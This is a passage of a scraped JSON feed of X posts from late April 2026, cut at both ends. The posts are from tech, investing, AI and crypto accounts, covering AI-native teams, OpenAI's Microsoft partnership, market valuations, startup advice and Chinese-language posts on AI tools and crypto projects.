on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "我不说你们自己看\n同一套提示词\nhappyhorse和seedance2\n赛博商K以后可以当视频模型的基准测试了", + "url": "https://x.com/CuiMao/status/2048786486435492337", + "published_at": "2026-04-27T15:28:57+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 years. Supporters of this action live in a fantasy dystopia about how science operates.", + "url": "https://x.com/ylecun/status/2048779086168838610", + "published_at": "2026-04-27T14:59:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: When I wrote The New White Nationalism in America in 2002, there were roughly 2,000 KKK members left in the entire nation — and a large percentage were suspected paid informants.\n\nReal hate groups were so sparse that the Southern Poverty Law Center was being openly accused of inflating numbers to scare Holocaust survivors and other donors. Their annual “hate map” literally required them to invent new threats every year just to keep the fundraising machine running.\n\nBack then, a “white supremacist” actually meant someone who believed their own race was superior to others.\n\nThen came the Obama administration’s tight collaboration with the SPLC — and everything changed. Suddenly all whites could be branded “privileged racists” by default.\nMy book warned that identity politics, racial grievance culture, and the suppression of honest debate would breed exactly this kind of backlash and division. It was a call for genuine integration and color-blind justice instead.\n\nIgnored then. More relevant than ever now — especially after the SPLC’s recent federal fraud indictment for allegedly paying millions to informants inside the very extremist groups it claims to oppose.\nRead the prescient warning here:\nhttps://www.aei.org/articles/the-new-white-nationalism-in-america/\n(Full book available on Amazon/Cambridge University Press)\n#SPLCFraud #SPLCIndicted #SPLCExposed #HateMap #HateForProfit", + "url": "https://x.com/elonmusk/status/2048765165533868432", + "published_at": "2026-04-27T14:04:14+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://x.com/HarryStebbings/status/2048764743205134644", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://x.com/HarryStebbings/status/2048764741435179442", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "最近想玩链游的可以看看 @RealGoOfficial 这个游戏\n\n他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。\n\n他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如 Doge、Floki、Toshi 和 WIF 等等,之前和 @xhunt_ai 也有过合作。\n\n大概今年 Q2 会 TGE,有时间可以玩一玩,可以参加一下他们的忠诚度计划,玩游戏或交互都可以撸积分和代币。", + "url": "https://x.com/wolfyxbt/status/2048764088193569049", + "published_at": "2026-04-27T13:59:57+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048761760971096534", + "published_at": "2026-04-27T13:50:42+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "把 new-api 的 UI 用 Hero UI 重构了一遍。之前他们用的那个抖音的 semi 设计系统太垃圾了。", + "url": "https://x.com/dingyi/status/2048760423491764431", + "published_at": "2026-04-27T13:45:23+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://x.com/JeffDean/status/2048759102390899142", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://x.com/HarryStebbings/status/2048756619622707452", + "published_at": "2026-04-27T13:30:16+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://x.com/soumithchintala/status/2048756358820827564", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://x.com/sama/status/2048755148361707946", + "published_at": "2026-04-27T13:24:26+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", + "url": "https://x.com/charliebilello/status/2048753179471323584", + "published_at": "2026-04-27T13:16:36+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://x.com/sama/status/2048751392031203544", + "published_at": "2026-04-27T13:09:30+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048751094671585397", + "published_at": "2026-04-27T13:08:19+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "未收货,仅退款,", + "url": "https://x.com/CuiMao/status/2048742972020470168", + "published_at": "2026-04-27T12:36:02+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the net error rate in counting presidential votes was 0.007%. The median shift in any county's vote count was zero.", + "url": "https://x.com/ylecun/status/2048740712556933170", + "published_at": "2026-04-27T12:27:04+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: @grok 你说说呢", + "url": "https://x.com/CuiMao/status/2048739316969648376", + "published_at": "2026-04-27T12:21:31+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "一喝梅酒就浑身刺挠,,我这是过敏吗?", + "url": "https://x.com/CuiMao/status/2048736420198842831", + "published_at": "2026-04-27T12:10:00+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "栋哥换账号了,帮忙转发一下", + "url": "https://x.com/lxfater/status/2048726973682475250", + "published_at": "2026-04-27T11:32:28+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Image", + "url": "https://x.com/Stv_Lynn/status/2048713165232644251", + "published_at": "2026-04-27T10:37:36+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: AI has had one safest technology roll-outs in history.\n\nRead that again, because it's a fact. \n\nIt's used by billions with a tiny fraction of a percent of actual problems.\n\nAnd yet it's seen as dangerous or unsafe by many.\n\nThere's a constant chorus of people shouting about its supposed dangers with no evidence whatsoever where it matters most: here, in the real world.\n\nSo what do we actually have here in reality?\n\nA few cases in courts about early versions of ChatGPT allegedly being too sycophantic and not recognizing mental illness or someone in trouble, that are still making their way through courts and may prove wrong or right (some of the media released snippets are damning but not definitive).\n\nTime will tell. Innocent until proven guilty. The very nature of court litigation is often to find a scapegoat for something that gets thrown out in the actual process of the trial.\n\nBut outside of that, what? \n\nAnswer: not much.\n\nAnd viewed through the lens of other technology in history its incident rate is probably lower than lawnmowers.\n\nIt makes little sense when you think of it through the lens of other tech like cars and planes, which had atrocious early track records. \n\nAI even has a better track record of safety than nuclear.\n\nDespite being incredibly safe overall, nuclear had several high profile and dangerous failures with Three Mile Island and Fukishima.\n\nWith AI, nothing of the sort. Not even remotely.\n\nI can hear the naysayers now saying \"so far, but just you wait!\"\n\nAnd yet we keep waiting. And waiting. And waiting.\n\nAI fear is a remarkably resilient beast. \n\nIt's resilient despite zero actual harms manifesting here in reality land.\n\nSelf-driving cars are remarkably safer than humans who kill 1.2 million people and injure 50 million more each year world wide. (I wrote 1.5M in an early posted and missed my typo).\n\nWaymo cars are roughly 10X safer than humans with minimal injuries and fatalities. Even early self-driving cars had incredibly good safety records vis-a-vis early cars driven by humans that had bad safety records even up through the 1950s and 60s.\n\nWhen it comes to cars, society actually resisted making them safer. People fought having to wear seatbelts because they had to pay for them. They resisted early drunk driving laws as impingements on their freedom.\n\nEarly plane travels was incredibly dangerous. It took many many decades of work to make them the marvels of safety they are today.\n\nWhat about jobs?\n\nWe have AI execs talking about the \"end of work\" and yet they're hiring more people in the very profession that is supposedly most exposed: programming. Often at super high salaries approaching half a million dollars a year.\n\nDemand for good programmers is rising.\n\nWe've certainly had execs claim they let people go because of AI. But a deeper look at these claims quickly reveals that most of them are just an easy way to get around labor laws or to simp to shareholders and more readily attributable to COVID over hiring. Tell shareholders \"AI\" is the reason for layoffs and you're rewarded for being more \"efficient.\" Tell them you have to lay people off because you over hired or just made mistakes and your stock gets hammered.\n\nThe truth is that anyone who uses AI seriously at the frontier sees how much they have to baby sit it and hand hold it and steer it. It is not doing any job end to end. It's doing tasks and that is about it.\n\nNow it will certainly get better but will it magically make the leap from task to job? Maybe. But we'll need evidence of that in, you guessed it, reality before we start making policy decisions.\n\nSo what other problems do we have here in reality?\n\nNothing but the two problems I've already discussed at length in my work:\n\nSurveillance and weapons of war.\n\nBut these are not new. They're just things that AI enhances, just like computers enhanced them, and better materials science, and many other tech revolutions before them.\n\nAgain, ask yourself, really ask yourself, where are the real problems? \n\nAnd again, there's a loud chorus of people who keep shouting \"just you wait, I imagined this problem in my head and it's totally inevitable because I say so\" and yet billions of people are using this technology every day with no problems.\n\nNow you could say \"Russell's Turkey.\" The trend is the trend until it breaks. But then the burden is on you to prove the trend is breaking. There is no evidence of it other than in people's minds.\n\nAt what point do people just wake up and realize that none of this makes any sense?\n\nIt's not that there won't be problems. It's just that often times the problems we imagine (we've been imagining the end of all work for 100 years) don't match what happens in actual reality. The problems turn out to be very different and you can only deal with them when they come up.\n\nA lot of politicians today imagined if they had only \"gotten ahead\" of the Internet with regulations we'd be in a much better place.\n\nUtter nonsense. When Section 230 was passed the number one question among Congress was \"what is the Internet?\" And these folks are supposed to imagine TikTok 25 years later? \n\nNo. \n\nWe have to deal with problems as they come up, not imaginary problems that some very vocal people promise are coming. The burden is on them to prove it and writing long essays from \"first principles thinking\" and scary books does not count as evidence for anything at all.\n\nAt what point does the cognitive dissonance hit and people wake up and say, maybe I was wrong?\n\nProbably never.\n\nBeliefs are a tricky thing and wrong beliefs have caused more problems in world history than AI ever will.", + "url": "https://x.com/ylecun/status/2048709585360367651", + "published_at": "2026-04-27T10:23:22+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://x.com/paulg/status/2048704073356935676", + "published_at": "2026-04-27T10:01:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://x.com/paulg/status/2048701354672050286", + "published_at": "2026-04-27T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "以后有好东西是真不能说出去,大家都知道了很快就没了。。。DMIT 美区 Premium 竟然所有套餐都卖光了,前两天还全都有呢。", + "url": "https://x.com/dingyi/status/2048700446425165890", + "published_at": "2026-04-27T09:47:04+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "Meta 对 Manus 的收购被中国发改委驳回。\n看来以后要么一开始就出海,要么就不出海。", + "url": "https://x.com/0xAA_Science/status/2048685380304871774", + "published_at": "2026-04-27T08:47:12+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://x.com/paulg/status/2048677984106664227", + "published_at": "2026-04-27T08:17:48+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~", + "url": "https://x.com/0xAA_Science/status/2048666088733581805", + "published_at": "2026-04-27T07:30:32+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好\n\n现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了", + "url": "https://x.com/bozhou_ai/status/2048663377598452202", + "published_at": "2026-04-27T07:19:46+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Image", + "url": "https://x.com/ylecun/status/2048655735412650355", + "published_at": "2026-04-27T06:49:24+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 中文AI必关注12位高价值博主\n\nAI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。\n\n我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。\n\n1. 摸鱼巨匠 @SunNeverSetsX\nAI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强\n\n2. Rachel @Zesee\n前微软亚马逊产品人,现在深耕AI营销创业,分享产品开发实操和行业洞察,干货密度高\n\n3. 小将 @nftbanker\n欧洲GenAI大会主办方 + 最大华人AI出海社区创始人,副业创业和落地案例特别实在\n\n4. WaytoAGI @WaytoAGI\n中文AI知识库整理专家,像随身AI百科一样持续更新一手资讯和实战总结\n\n5. 汗青 HQ @hq4ai\n\nAI创意与AIGC艺术应用先锋,专注虚拟偶像、AI-IP创作和短视频灵感,技术与艺术结合得非常出色\n\n6. Mulight 沐光 @0xMulight\n专注AI工具深度测评 + 手机端高效工作流(Hermes WebUI等),自动化提效方案直接能用,实用党福音\n\n7. 阿西_出海 @axichuhai\nAI+LLM+Agent副业实战派,分享自媒体变现路径和真实落地打法\n\n8. 泊舟 @bozhou_ai\nVibe编码与Agent构建高手,系统Prompt和高效工作流拆解非常清晰\n\n9. berryxia @berryxia\nPrompt工程与AI工具设计专家,设计+编码+提示词三合一输出,质量顶尖\n\n10. CuiMao @CuiMao\n纯干货AI开发者,不接广告,专注深度学习实战分享\n\n11. GoSailGlobal @GoSailGlobal\n独立SaaS出海玩家,AI产品价值提炼和真实创业经验分享很接地气\n\n12. 范凯说 AI @fankaishuoai\nAI时代个人转型实战导师,提供可直接执行的框架和落地方法论", + "url": "https://x.com/bozhou_ai/status/2048640580004335669", + "published_at": "2026-04-27T05:49:10+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://x.com/paulg/status/2048615296613937201", + "published_at": "2026-04-27T04:08:42+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "狗B们在组团在 bags 分流太空狗,好恶心啊。\n下次它们买什么,咱们就去找个新盘子分,好吗?", + "url": "https://x.com/0xAA_Science/status/2048610365324623966", + "published_at": "2026-04-27T03:49:07+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。\n\n一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。\n\n它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广:\n\nAI 端:Claude Code、Codex、Cursor、Gemini CLI、Kimi CLI 等 10 多种\n聊天端:飞书、钉钉、Telegram、Slack、Discord、企业微信、QQ 等 11 个平台\n\n功能也挺全:\n1. 不需要公网 IP,大部分平台直接连\n2. 支持语音、图片、文件发送\n3. 多项目同时跑,一个进程搞定\n4. 会话管理,能创建、切换、看历史\n5. 斜杠命令控制模型切换、权限、工作目录\n6. 定时任务,用自然语言就能设\n7. 带 Web 管理界面,配置不用碰命令行\n8. 支持不同用户隔离运行,安全性有保障\n\n简单说就是:出门在外,手机上打开飞书或 Telegram 就能让 Claude Code 继续干活。\n\nhttp://github.com/chenhg5/cc-connect", + "url": "https://x.com/bozhou_ai/status/2048603768250585231", + "published_at": "2026-04-27T03:22:54+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "刚发现私信里好多人问:怎么搞 cursor,哪里申请。\n\n还有人更直接:账号密码发过来,给我用用。。。\n\n我。。。。。。", + "url": "https://x.com/dingyi/status/2048592243754504229", + "published_at": "2026-04-27T02:37:06+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "每天刷 timeline:\n\n外国人都是认真分享自己的作品、产品、生活。\n\n中国人都是:注册美国公司、买海外 sim 卡、薅羊毛、吵架撕逼……", + "url": "https://x.com/dingyi/status/2048585369315316105", + "published_at": "2026-04-27T02:09:47+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "不要骂我了,山寨季已经来过了\n\n$TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。\n\n觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。\n\n山寨币是赚钱容易而已,不是所有人都赚钱。", + "url": "https://x.com/wolfyxbt/status/2048581892333867398", + "published_at": "2026-04-27T01:55:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "人生第一次录播客,我们和cell老师一起聊聊中转站的那些事", + "url": "https://x.com/bozhou_ai/status/2048571760698949641", + "published_at": "2026-04-27T01:15:43+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://x.com/sama/status/2048554097985593849", + "published_at": "2026-04-27T00:05:31+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://x.com/sama/status/2048552677433643427", + "published_at": "2026-04-26T23:59:53+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @RiverdotInc 第五季创作者排名战正式打响🏆 \n赛季时间:4月22日 → 26年Q2结束📅 \n这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ \n另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 \n@River4fun 💧\n\n我也已经加入到第五季的战斗", + "url": "https://x.com/chuxiaeth/status/2048547844982976544", + "published_at": "2026-04-26T23:40:41+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor aurait lieu ailleurs. Il faut l'exploiter au mieux.\n\n👇 Discussion dans Le Monde", + "url": "https://x.com/ylecun/status/2048547683112046771", + "published_at": "2026-04-26T23:40:02+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @ferra_protocol 居然也上贵金属永续合约了🥇 \n现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 \n\n如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 \n\n交互链接: https://ferra.ag?code=tBYQfU0aq\n\n进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀", + "url": "https://x.com/chuxiaeth/status/2048545974747070599", + "published_at": "2026-04-26T23:33:15+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "A small library of quiet loaders.\n\nhttps://icons.icantcode.fyi/", + "url": "https://x.com/dingyi/status/2048536915222376906", + "published_at": "2026-04-26T22:57:15+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://x.com/HarryStebbings/status/2048531257399664920", + "published_at": "2026-04-26T22:34:46+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://x.com/DavidSacks/status/2048502978626113625", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension.\n\nWe're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more easily directly within the X app.", + "url": "https://x.com/frxiaobei/status/2048487623250063516", + "published_at": "2026-04-26T19:41:23+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry 